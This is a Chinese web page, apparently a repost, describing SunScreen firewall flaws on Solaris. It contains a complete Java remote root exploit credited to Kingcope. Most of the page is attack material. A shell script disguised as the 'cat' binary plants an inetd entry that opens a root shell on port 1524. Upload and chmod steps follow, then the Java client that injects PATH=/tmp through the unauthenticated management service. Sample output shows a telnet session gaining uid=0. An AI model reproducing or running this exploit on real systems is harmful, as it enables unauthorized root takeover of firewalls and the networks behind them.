本文介绍Sun公司的SunScreen防火墙中存在的多个缓冲区溢出漏洞及任意代码执行风险,并提供了一个远程获取root权限的exploit示例。
SunScreen是sun公司一款防火墙,它运行在sun操作系统的3858端口上,可以通过一个java服务程序进行远程管理。这个java服务包含了大量的缓冲区溢出漏洞(至少两个),此外,如果攻击者可以上传文件到系统上还能够执行任意代码。下面这个exploit上传至远程服务器上就可以以root权限执行。
001 /*
002
003 Sun Microsystems SunScreen Firewall Root Exploit
004 discovered & exploited by Kingcope
005 January 2011
006
007 The SunScreen Firewall can be administrated remotely via a java protocol service
008 which is running on port 3858 on a SunOS machine.
009
010 This Java Service contains numerous buffer overruns (2 of which I am aware of).
011 Furthermore it is possible to execute arbitrary code if an attacker manages
012 to upload a file onto the target system.
013
014 As you can see in the following java exploit code the environment
015 is not properly sanitized prior to executing shell scripts as root,
016 thus one can use the LD technique to preload binaries or even easier
017 modify the PATH variable to forge the ´cat´ binary (which is executed by lib/screenname)
018 to be executed in a different place.
019
020 This can be exploited locally - remotely especially if anonymous ftp uploads
021 are possible or any other file transfer protocol is activated. Uploading
022 a file via the line printer daemon might also be possible.
023
024 This has been tested on a SunOS 5.9.
025
026 The shell script to be forged as the ´cat´ binary..
027
028 #!/bin/sh
029 echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;
030 /usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x
031 echo "+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++"
032 #---
033
034 upload above shell script to /PATH/cat
035 chmod a+x /PATH/cat
036 supply target and PATH envvar to exploit
037
038 Opens a root shell on port 1524/tcp (ingreslock)
039 A successfull exploit looks like
040
041 $ java SimpleClient
042
043 ? ??ð? &Connection accepted, no authentication¶? O
044 +++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED YA+++ WE OWNED Y
045 A+++
046
047 $ telnet 192.168.2.3 1524
048 Trying 192.168.2.3...
049 Connected to 192.168.2.3.
050 Escape character is ''^]''.
051 # /bin/uname -a;
052 SunOS unknown 5.9 Generic_118558-34 sun4u sparc SUNW,Ultra-5_10
053 ^M: not found
054 # /b
055 in/id;
056 uid=0(root) gid=1(other)
057 ^M: not found
058 #
059
060 */
061
062 import java.net.*;
063 import java.io.*;
064 import java.util.*;
065 import java.text.DateFormat;
066 public class SimpleClient {
067
068 public static void main(String args[]) {
069
070 String str;
071
072 try {
073
074 Socket s1 = new Socket("192.168.2.3", 3853);
075
076 InputStream is = s1.getInputStream();
077
078 DataInputStream dis = new DataInputStream(is);
079
080 OutputStream s1out = s1.getOutputStream();
081 DataOutputStream dos = new DataOutputStream(s1out);
082
083 dos.writeByte(1);
084 dos.writeByte(0);
085 dos.writeShort(0);
086 dos.writeInt(0);
087 dos.writeByte(3);
088 dos.writeByte(0);
089 dos.writeShort(2000);
090 dos.writeShort(0);
091 dos.writeShort(0);
092
093 dos.writeUTF("0xtest");
094 dos.writeByte(3);
095 dos.writeByte(1);
096 dos.writeByte(1);
097 dos.writeByte(1);
098 dos.writeInt(3);
099 dos.writeInt(0);
100 dos.writeInt(0);
101
102 dos.writeUTF("PATH=/tmp");
103 dos.writeUTF("lib/screenname");
104
105 dos.writeUTF("admin1");
106
107 str = dis.readLine();
108 System.out.println(str);
109
110 str = dis.readLine();
111 System.out.println(str);
112
113 dis.close();
114 dos.close();
115 s1.close();
116 } catch (ConnectException connExc) {
117 System.err.println("Could not connect to the server.");
118 } catch (IOException e) {
119 // foo
120 }
121 }
122 }
扫一扫
555
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
